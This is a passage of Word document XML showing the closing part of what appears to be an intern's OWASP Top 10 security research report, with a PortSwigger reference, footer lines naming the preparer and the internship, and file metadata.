        <w:t xml:space="preserve">PortSwigger Web Security Academy. (2024). SQL Injection, XSS, Access Control Labs. https://portswigger.net/web-security</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="300"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">— End of Report —</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Prepared by: Aaisha Baig  |  VortexTech Cybersecurity Internship 2026  |  Week 1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200"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">Prepared by: Aaisha Baig  |  Security Researcher  |  VortexTech Internship 2026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200"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">OWASP Top 10 — Security Research Report</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="888888"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  VortexTech Cybersecurity Internship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2026-07-02T12:33:52.815Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-07-02T12:33:52.815Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>